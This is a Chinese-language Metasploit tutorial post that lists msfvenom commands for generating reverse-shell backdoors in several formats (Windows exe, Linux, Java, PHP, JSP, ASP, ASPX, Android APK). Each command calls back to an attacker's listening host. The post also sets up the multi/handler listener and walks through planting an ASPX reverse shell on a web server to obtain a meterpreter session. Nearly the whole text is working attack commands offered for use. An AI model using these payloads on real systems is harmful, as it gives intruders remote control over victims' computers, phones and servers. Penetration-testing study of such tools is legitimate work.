標籤:load raw php windows ever 51cto test back 命令
本章節的後門有以下幾種
windows -->使用模組“windows/meterpreter/reverse_tcp”
命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.exe
參考“09-Metasploit之我的遠端控制軟體”
linux -->使用模組“linux/x86/meterpreter/shell_rverse_tcp”
命令:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 X >text
參考文章:http://xiao106347.blog.163.com/blog/static/215992078201310253172937/
java -->使用模組“java/meterpreter/reverse_tcp”
命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 W >text.jar
php -->使用模組“php/meterpreter/reverse_tcp”
命令:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw >text.php
參考文章:http://www.111cn.net/phper/phpanqn/101228.htm
jsp -->使用模組“java/jsp_shell_reverse_tcp”
命令:msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.146 LPORT=1234 R >text.jsp
參考文章:http://netsecurity.51cto.com/art/201406/442648.htm
asp -->使用模組“windows/meterpreter/reverse_tcp”
命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f asp > shell.asp
參考文章:http://www.ithao123.cn/content-10813776.html
aspx -->使用模組“windows/meterpreter/reverse_tcp”
命令:msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx
參考文章:http://www.ithao123.cn/content-10813776.html
android -->使用模組“android/meterpreter/reverse_tcp”
命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 R >text.apk
參考“13-Metasploit之滲透安卓實戰”
反彈串連的訪問:
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
------------------------------------------------------------------------------------------------
Metasploit-web滲透
參考文獻:http://www.ithao123.cn/content-10813776.html
首先用Metasploit產生反彈馬,也就是產生反彈的payload:
成功產生反彈型payload:
(1)
產生win下的exe
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5566 -f exe x> /home/niexinming/back.exe
(2)
產生win下的aspx
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx
其他的產生payload 的方法見:http://netsec.ws/?p=331
(3)
我產生一個aspx的反彈馬
然後啟動msfconsole
(4)
本地監聽,反彈後的控制端:use exploit/multi/handler
(5)
本地監聽的確定用哪個payload:
set payload windows/meterpreter/reverse_tcp
(6)
設定本地監聽的連接埠:
set lport 7788
(7)
設定本地的監聽的地址:
set lhost 0.0.0.0
(8)
運行:
run
(9)
訪問產生的反彈馬:
http://xxx.xxx.xx.xxx:/back.aspx
得到meterpreter的shell
Metasploit之多種後門產生